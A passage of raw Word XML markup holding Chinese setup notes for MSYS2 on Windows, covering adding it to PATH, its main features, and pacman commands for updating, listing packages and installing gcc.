        <w:t>）的后继版本，提供了一套更现代、更稳定的工具链和软件包管理系统。它的目标是为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户提供一个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境，使得在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上进行软件开发、编译和运行类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工具更加方便。</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将其</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录添加到</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="00A024B3" w:rsidRPr="00A024B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>环境变量中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B84E24" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509A7A18" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>主要特点包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514ABB57" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B01E387" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>软件包管理：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSYS2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Pacman</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>作为软件包管理器，允许用户轻松地安装、升级和删除软件包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52829399" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76654173" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>提供了类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>环境，使用户可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>命令行中使用一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Unix/Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258CD60F" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FCCBE7" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>编译工具链：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>包括一套用于编译和构建软件的工具链，使得开发者可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>上进行跨平台的开发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B271736" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A545CC" w14:textId="35B25898" w:rsidR="0038204E" w:rsidRPr="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>支持多种开发工具和语言：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSYS2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>支持多种编程语言，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>等，以及常见的开发工具和库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053CA89" w14:textId="77777777" w:rsidR="0038204E" w:rsidRDefault="0038204E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68539787" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5AC852" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052616AB" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5622F1" w14:textId="2060DF9F" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新本地软件包数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BFEA31" w14:textId="08E79E3D" w:rsidR="009715E0" w:rsidRPr="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009715E0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pacman -Syu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94ACEB" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46280329" w14:textId="50DA4FE9" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pacman -Syu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSYS2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Arch Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等发行版中用于更新系统的命令。这个命令有以下含义：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6E15B" w14:textId="5EFC83FF" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -S: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示同步（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Synchronize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。它用于更新本地软件包数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA646B5" w14:textId="1860B3B1" w:rsidR="009715E0" w:rsidRPr="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -y: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在同步操作时，不询问确认，直接同步软件包数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F358B0" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -u: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示升级（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。它用于升级系统中已安装的软件包到最新版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DFDA0" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD2C04B" w14:textId="623889D7" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>综合起来，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pacman -Syu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令可以解释为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524FE0AA" w14:textId="4BFA5E32" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同步本地软件包数据库，即从远程仓库获取最新的软件包信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AC5CE" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级系统中已经安装的所有软件包到它们的最新版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64335DD4" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A380BC" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是保持系统和安装的软件包更新的标准操作。使用这个命令可以确保您的系统和所有软件包都是最新的，同时更新软件包数据库，以便在安装新软件包时获得最新的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E634C" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574DB86B" w14:textId="29841A86" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pacman -Syu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前，请确保您的网络连接正常，并且在进行系统更新之前备份重要数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>据，以防意外情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D869C" w14:textId="77777777" w:rsidR="009715E0" w:rsidRDefault="009715E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6E4861" w14:textId="42887E13" w:rsidR="009715E0" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看已安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA3FB7" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C5CFE8" w14:textId="1B8BEA5D" w:rsidR="00300FD7" w:rsidRDefault="002F5AB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pac</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">man -Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不带参数，可以直接打印当前安装的包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F5054" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE88A1D" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05859A61" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRPr="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5D126D" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0364B48A" w14:textId="77777777" w:rsidR="00300FD7" w:rsidRDefault="00300FD7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A24C2D5" w14:textId="36043584" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器</w:t>
      </w:r>
      <w:r w:rsidR="00565C5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如安装</w:t>
      </w:r>
      <w:r w:rsidR="00565C5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="00565C5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB1D79F" w14:textId="49DBF2B9" w:rsidR="00CC5F21" w:rsidRPr="008B3C40" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5F21">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$ pacman -S mingw-w64-ucrt-x86_64-gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD9C30" w14:textId="320150F2" w:rsidR="008B3C40" w:rsidRPr="008B3C40" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>随后便可以使用</w:t>
      </w:r>
